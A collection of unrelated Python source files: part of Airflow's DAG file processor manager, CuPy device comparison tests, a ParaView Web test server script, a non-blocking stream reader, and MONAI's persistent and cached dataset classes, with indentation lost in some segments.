:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
finished_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
running_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.error(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def start_new_processes(self):
""""
Start more processors if we have enough slots and files to process
"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
def prepare_file_path_queue(self):
"""
        Generate more file paths to process. Results are saved in _file_path_queue.
"""
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
        Find zombie task instances, which are tasks that haven't heartbeated
        for too long, and update the current zombie list.
"""
now = timezone.utcnow()
zombies: List[SimpleTaskInstance] = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
        Kill any file processors that have timed out, to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
                # TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if child_processes:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
        Emit metrics about the DAG parsing summary.
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
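

# Editor's note: an illustrative factory, not part of the original source.  The
# manager calls it as factory(file_path, zombies) in start_new_processes()
# above; this sketch simply reuses the hypothetical stub processor defined
# earlier, whereas a real deployment would return the scheduler's
# DagFileProcessorProcess.
def _example_processor_factory(file_path, zombies):  # zombies is unused here
    """Return a (stub) processor for ``file_path``."""
    return _StubDagFileProcessorProcess(file_path)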
|
test_device.py
|
import threading
import unittest
import pytest
import six
from cupy import cuda
from cupy import testing
class TestDeviceComparison(unittest.TestCase):
def check_eq(self, result, obj1, obj2):
if result:
assert obj1 == obj2
assert obj2 == obj1
assert not (obj1 != obj2)
assert not (obj2 != obj1)
else:
assert obj1 != obj2
assert obj2 != obj1
assert not (obj1 == obj2)
assert not (obj2 == obj1)
def test_equality(self):
self.check_eq(True, cuda.Device(0), cuda.Device(0))
self.check_eq(True, cuda.Device(1), cuda.Device(1))
self.check_eq(False, cuda.Device(0), cuda.Device(1))
self.check_eq(False, cuda.Device(0), 0)
self.check_eq(False, cuda.Device(0), None)
self.check_eq(False, cuda.Device(0), object())
def test_lt_device(self):
assert cuda.Device(0) < cuda.Device(1)
assert not (cuda.Device(0) < cuda.Device(0))
assert not (cuda.Device(1) < cuda.Device(0))
def test_le_device(self):
assert cuda.Device(0) <= cuda.Device(1)
assert cuda.Device(0) <= cuda.Device(0)
assert not (cuda.Device(1) <= cuda.Device(0))
def test_gt_device(self):
        assert not (cuda.Device(0) > cuda.Device(1))
assert not (cuda.Device(0) > cuda.Device(0))
assert cuda.Device(1) > cuda.Device(0)
def test_ge_device(self):
assert not (cuda.Device(0) >= cuda.Device(1))
assert cuda.Device(0) >= cuda.Device(0)
assert cuda.Device(1) >= cuda.Device(0)
def check_comparison_other_type(self, obj1, obj2):
with pytest.raises(TypeError):
obj1 < obj2
with pytest.raises(TypeError):
obj1 <= obj2
with pytest.raises(TypeError):
obj1 > obj2
with pytest.raises(TypeError):
obj1 >= obj2
with pytest.raises(TypeError):
obj2 < obj1
with pytest.raises(TypeError):
obj2 <= obj1
with pytest.raises(TypeError):
obj2 > obj1
with pytest.raises(TypeError):
obj2 >= obj1
@unittest.skipIf(
six.PY2, 'Python 2 comparison result of objects is arbitrary')
def test_comparison_other_type(self):
self.check_comparison_other_type(cuda.Device(0), 0)
self.check_comparison_other_type(cuda.Device(0), 1)
self.check_comparison_other_type(cuda.Device(1), 0)
self.check_comparison_other_type(cuda.Device(1), None)
self.check_comparison_other_type(cuda.Device(1), object())
@testing.gpu
class TestDeviceAttributes(unittest.TestCase):
def test_device_attributes(self):
d = cuda.Device()
attributes = d.attributes
assert isinstance(attributes, dict)
assert all(isinstance(a, int) for a in attributes.values())
# test a specific attribute that would be present on any supported GPU
assert 'MaxThreadsPerBlock' in attributes
def test_device_attributes_error(self):
with pytest.raises(cuda.runtime.CUDARuntimeError):
# try to retrieve attributes from a non-existent device
cuda.device.Device(cuda.runtime.getDeviceCount()).attributes
@testing.gpu
class TestDeviceHandles(unittest.TestCase):
def _check_handle(self, func):
handles = [func(), None, None]
def _subthread():
handles[1] = func()
handles[2] = func()
t = threading.Thread(target=_subthread)
t.start()
t.join()
assert handles[0] is not None
assert handles[0] != handles[1]
assert handles[1] == handles[2]
def test_cublas_handle(self):
self._check_handle(cuda.get_cublas_handle)
def test_cusolver_handle(self):
self._check_handle(cuda.device.get_cusolver_handle)
def test_cusolver_sp_handle(self):
self._check_handle(cuda.device.get_cusolver_sp_handle)
def test_cusparse_handle(self):
self._check_handle(cuda.device.get_cusparse_handle)
|
TestPythonParaViewWeb.py
|
#!/usr/bin/env python
# Global python import
import exceptions, traceback, logging, random, sys, threading, time, os
# Update python path to have ParaView libs
build_path='/Volumes/SebKitSSD/Kitware/code/ParaView/build-ninja'
sys.path.append('%s/lib'%build_path)
sys.path.append('%s/lib/site-packages'%build_path)
# ParaView import
from vtk.web import server
from paraview.vtk import *
from paraview.web import wamp as pv_wamp
#------------------------------------------------------------------------------
# InLine protocol
#------------------------------------------------------------------------------
class TestProtocol(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
fileToLoad = None
groupRegex = "[0-9]+\\."
excludeRegex = "^\\.|~$|^\\$"
@staticmethod
def updateArguments(options):
TestProtocol.dataDir = options.dataDir
TestProtocol.authKey = options.authKey
TestProtocol.fileToLoad = options.fileToLoad
TestProtocol.groupRegex = options.groupRegex
TestProtocol.excludeRegex = options.excludeRegex
def initialize(self):
from paraview import simple
from paraview.web import protocols as pv_protocols
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileListing(TestProtocol.dataDir, "Home", TestProtocol.excludeRegex, TestProtocol.groupRegex))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
# Update authentication key to use
self.updateSecret(TestProtocol.authKey)
#------------------------------------------------------------------------------
# ParaView Test default arguments
#------------------------------------------------------------------------------
class WebArguments(object):
def __init__(self, webDir = None):
self.content = webDir
self.port = 8080
self.host = 'localhost'
self.debug = 0
self.timeout = 120
self.nosignalhandlers = True
self.authKey = 'vtkweb-secret'
self.uploadDir = ""
self.testScriptPath = ""
self.baselineImgDir = ""
self.useBrowser = ""
self.tmpDirectory = ""
self.testImgFile = ""
self.forceFlush = False
self.dataDir = '.'
self.groupRegex = "[0-9]+\\."
self.excludeRegex = "^\\.|~$|^\\$"
self.fileToLoad = None
def __str__(self):
return "http://%s:%d/%s" % (self.host, self.port, self.content)
#------------------------------------------------------------------------------
# Start server
#------------------------------------------------------------------------------
def start():
args = WebArguments('%s/www' % build_path)
TestProtocol.updateArguments(args)
server.start_webserver(options=args, protocol=TestProtocol)
def start_thread():
thread = threading.Thread(target=start)
print ("Starting thread")
thread.start()
for i in range(20):
print ("Working... %ds" % (i*5))
time.sleep(5)
thread.join()
print ("Done")
#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------
if __name__ == "__main__":
start_thread()
|
nonblocking_stream_reader.py
|
# idea from http://eyalarubas.com/python-subproc-nonblock.html
from queue import Queue, Empty
from threading import Thread
class NonBlockingStreamReader:
def __init__(self, stream):
self._stream = stream
self._queue = Queue()
self._thread = None
self.closed = True
def start(self, push_callback=None):
self.closed = False
def _worker():
while True:
line = self._stream.readline()
if line:
if push_callback:
push_callback(line)
self._queue.put(line)
else:
self.closed = True
raise RuntimeError("line is empty")
self._thread = Thread(target=_worker)
self._thread.daemon = True
self._thread.name = "NonBlockingStreamReader of %s" % repr(self._stream)
self._thread.start()
return self
def readline(self, timeout=None):
try:
return self._queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
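# Illustrative usage sketch (hypothetical, not part of the original module): wrap a
# subprocess' stdout so the main loop can poll it without blocking. The `ping`
# command below is only an example and assumes a Unix-like system.
def _example_usage():
    import subprocess

    proc = subprocess.Popen(
        ["ping", "-c", "3", "localhost"],
        stdout=subprocess.PIPE,
        text=True,
    )
    reader = NonBlockingStreamReader(proc.stdout).start()
    while not reader.closed:
        line = reader.readline(timeout=0.1)  # returns None if nothing arrived in time
        if line:
            print(line.rstrip())
    proc.wait()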
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.serialization import DEFAULT_PROTOCOL
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import SUPPORTED_PICKLE_MOD, convert_tables_to_dicts, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, look_up_option, min_version, optional_import
from monai.utils.misc import first
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{'img': 'image1.nii.gz', 'seg': 'label1.nii.gz', 'extra': 123},
{'img': 'image2.nii.gz', 'seg': 'label2.nii.gz', 'extra': 456},
{'img': 'image3.nii.gz', 'seg': 'label3.nii.gz', 'extra': 789}]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
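# Illustrative usage sketch (not part of the original module): a `Dataset` with a
# trivial callable transform; slicing returns a `torch.utils.data.Subset` as
# described in the class docstring.
def _example_dataset():
    ds = Dataset(data=[{"value": i} for i in range(5)], transform=lambda x: x["value"] * 10)
    first_item = ds[0]   # -> 0
    subset = ds[1:4]     # -> Subset over indices 1, 2, 3
    return first_item, list(subset)  # -> (0, [10, 20, 30])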
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{'image': 'image1.nii.gz', 'label': 'label1.nii.gz', 'extra': 123},
{'image': 'image2.nii.gz', 'label': 'label2.nii.gz', 'extra': 456},
{'image': 'image3.nii.gz', 'label': 'label3.nii.gz', 'extra': 789}]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths, which are hashed to form the cache keys.
When loading persistent cache content, there is no guarantee that the cached data matches the
current transform chain, so please make sure to use exactly the same non-random transforms and
arguments as were used to build the cache, otherwise unexpected errors may occur.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects the input data to be a list of serializable items
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
default to `"pickle"`. due to the pickle limitation in multi-processing of Dataloader,
we can't use `pickle` as arg directly, so here we use a string name instead.
if want to use other pickle module at runtime, just register like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
self.pickle_module = pickle_module
self.pickle_protocol = pickle_protocol
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(
obj=_item_transformed,
f=temp_hash_file,
pickle_module=look_up_option(self.pickle_module, SUPPORTED_PICKLE_MOD),
pickle_protocol=self.pickle_protocol,
)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
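# Illustrative usage sketch (not part of the original module): the deterministic head
# of the transform chain is computed once and cached under `cache_dir`. `files` is a
# hypothetical list of dicts such as [{"image": "img1.nii.gz"}, ...].
def _example_persistent_dataset(files, cache_dir="./persistent_cache"):
    from monai.transforms import Compose, LoadImaged, Orientationd

    transforms = Compose([
        LoadImaged(keys=["image"]),
        Orientationd(keys=["image"], axcodes="RAS"),
    ])
    ds = PersistentDataset(data=files, transform=transforms, cache_dir=cache_dir)
    return ds[0]  # first access computes and caches, later accesses read from cache_dir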
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset` that also caches the results of the first N transforms, whether they are random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects the input data to be a list of serializable items
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
default to `"pickle"`. due to the pickle limitation in multi-processing of Dataloader,
we can't use `pickle` as arg directly, so here we use a string name instead.
if want to use other pickle module at runtime, just register like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
super().__init__(
data=data,
transform=transform,
cache_dir=cache_dir,
hash_func=hash_func,
pickle_module=pickle_module,
pickle_protocol=pickle_protocol,
)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
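# Illustrative usage sketch (not part of the original module): cache the output of the
# first `cache_n_trans` transforms, random or not. `files` is a hypothetical list of
# dicts such as [{"image": "img1.nii.gz"}, ...].
def _example_cache_n_trans(files, cache_dir="./cache_n_trans"):
    from monai.transforms import Compose, LoadImaged, Orientationd, RandFlipd

    transforms = Compose([
        LoadImaged(keys=["image"]),
        Orientationd(keys=["image"], axcodes="RAS"),
        RandFlipd(keys=["image"], prob=0.5),
    ])
    # only the results of the first two transforms are cached on disk
    return CacheNTransDataset(data=files, transform=transforms, cache_n_trans=2, cache_dir=cache_dir)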
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
